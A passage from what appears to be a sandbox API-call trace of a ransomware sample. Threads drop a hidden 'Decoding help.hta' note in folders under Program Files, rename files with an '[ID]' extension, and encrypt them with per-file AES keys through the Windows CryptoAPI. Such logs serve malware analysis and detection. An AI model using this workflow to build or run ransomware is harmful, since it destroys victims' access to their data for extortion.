nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.399] lstrcpyW (in: lpString1=0x2ab01088, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*" [0059.399] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*") returned 64 [0059.399] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\Decoding help.hta" [0059.399] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\decoding help.hta")) returned 0xffffffff [0059.399] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.652] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x22c8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x22c8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.653] CloseHandle (hObject=0x4bc) returned 1 [0060.653] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.875] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.875] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.875] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*" [0060.875] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*.*") returned 64 [0060.875] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" [0060.875] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" [0060.875] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.875] FindNextFileW (in: hFindFile=0x10fbc858, lpFindFileData=0x22c8fd30 | out: lpFindFileData=0x22c8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f08dd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe539e167, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe539e167, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.875] FindClose (in: hFindFile=0x10fbc858 | out: hFindFile=0x10fbc858) returned 1 Thread: id = 802 os_tid = 0xab8 [0054.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*", lpFindFileData=0x2354fd30 | out: lpFindFileData=0x2354fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14a00 [0058.687] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.687] FindNextFileW (in: hFindFile=0x10f14a00, lpFindFileData=0x2354fd30 | out: lpFindFileData=0x2354fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.687] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.687] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.687] FindNextFileW (in: hFindFile=0x10f14a00, lpFindFileData=0x2354fd30 | out: lpFindFileData=0x2354fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf63fa00, ftCreationTime.dwHighDateTime=0x1c9db19, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xaf63fa00, ftLastWriteTime.dwHighDateTime=0x1c9db19, nFileSizeHigh=0x0, nFileSizeLow=0x4d40, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.688] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*" [0058.688] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*") returned 70 [0058.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\Decoding help.hta" [0058.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\decoding help.hta")) returned 0xffffffff [0058.688] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd44 [0058.688] WriteFile (in: hFile=0xd44, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2354fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2354fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.689] CloseHandle (hObject=0xd44) returned 1 [0058.689] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.690] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.690] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*" [0058.690] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*.*") returned 70 [0058.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll" [0058.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll" [0058.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.690] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd44 [0058.691] CreateFileMappingA (hFile=0xd44, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd48 [0058.691] CryptAcquireContextA (in: phProv=0x2354fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2354fcec*=0x10e282c8) returned 1 [0060.240] CryptGenKey (in: hProv=0x10e282c8, Algid=0x6610, dwFlags=0x1, phKey=0x2354fce8 | out: phKey=0x2354fce8*=0x10f14a40) returned 1 [0060.240] CryptExportKey (in: hKey=0x10f14a40, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2354fbe4, pdwDataLen=0x2354fce4 | out: pbData=0x2354fbe4*, pdwDataLen=0x2354fce4*=0x2c) returned 1 [0060.240] MapViewOfFile (hFileMappingObject=0xd48, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4d40) returned 0x8640000 Thread: id = 803 os_tid = 0xa98 [0054.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*", lpFindFileData=0x2364fd30 | out: lpFindFileData=0x2364fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db638 [0056.847] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.847] FindNextFileW (in: hFindFile=0x5db638, lpFindFileData=0x2364fd30 | out: lpFindFileData=0x2364fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.847] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.847] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.847] FindNextFileW (in: hFindFile=0x5db638, lpFindFileData=0x2364fd30 | out: lpFindFileData=0x2364fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.847] lstrcpyW (in: lpString1=0x9a9b0d8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*" [0056.847] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*") returned 63 [0056.847] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Decoding help.hta" [0056.847] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\decoding help.hta")) returned 0xffffffff [0056.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb24 [0058.336] WriteFile (in: hFile=0xb24, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2364fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2364fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.337] CloseHandle (hObject=0xb24) returned 1 [0058.337] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.337] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.337] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.337] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*" [0058.337] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\*.*") returned 63 [0058.337] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg" [0058.337] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg" [0058.337] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.338] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\pl_PL\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\pl_pl\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb24 [0058.338] CreateFileMappingA (hFile=0xb24, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb28 [0058.338] CryptAcquireContextA (in: phProv=0x2364fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2364fcec*=0x2aac5670) returned 1 [0060.202] CryptGenKey (in: hProv=0x2aac5670, Algid=0x6610, dwFlags=0x1, phKey=0x2364fce8 | out: phKey=0x2364fce8*=0x5fca220) returned 1 [0060.202] CryptExportKey (in: hKey=0x5fca220, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2364fbe4, pdwDataLen=0x2364fce4 | out: pbData=0x2364fbe4*, pdwDataLen=0x2364fce4*=0x2c) returned 1 [0060.202] MapViewOfFile (hFileMappingObject=0xb28, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.189] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2364fbe4*, pdwDataLen=0x2364fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2364fbe4*, pdwDataLen=0x2364fcf8*=0x100) returned 1 [0064.189] CryptEncrypt (in: hKey=0x5fca220, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x2364fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x2364fce4*=0x140) returned 1 [0064.189] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.191] CloseHandle (hObject=0xb28) returned 1 [0064.192] CryptDestroyKey (hKey=0x5fca220) returned 1 [0064.192] CryptReleaseContext (hProv=0x2aac5670, dwFlags=0x0) returned 1 [0064.192] SetFilePointerEx (in: hFile=0xb24, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.192] WriteFile (hFile=0xb24, lpBuffer=0x2364fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2364fcf8, lpOverlapped=0x0) Thread: id = 804 os_tid = 0xa9c [0054.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*", lpFindFileData=0x2374fd30 | out: lpFindFileData=0x2374fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc898 [0059.400] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.400] FindNextFileW (in: hFindFile=0x10fbc898, lpFindFileData=0x2374fd30 | out: lpFindFileData=0x2374fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.400] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.400] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.400] FindNextFileW (in: hFindFile=0x10fbc898, lpFindFileData=0x2374fd30 | out: lpFindFileData=0x2374fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8e3ba89, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe9004ae5, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe9004ae5, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.400] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*" [0059.400] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*") returned 64 [0059.400] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\Decoding help.hta" [0059.400] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\decoding help.hta")) returned 0xffffffff [0059.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.654] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2374fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2374fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.655] CloseHandle (hObject=0x4bc) returned 1 [0060.655] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.876] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.876] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.876] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*" [0060.876] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*.*") returned 64 [0060.876] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" [0060.876] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" [0060.876] lstrcatW (in: 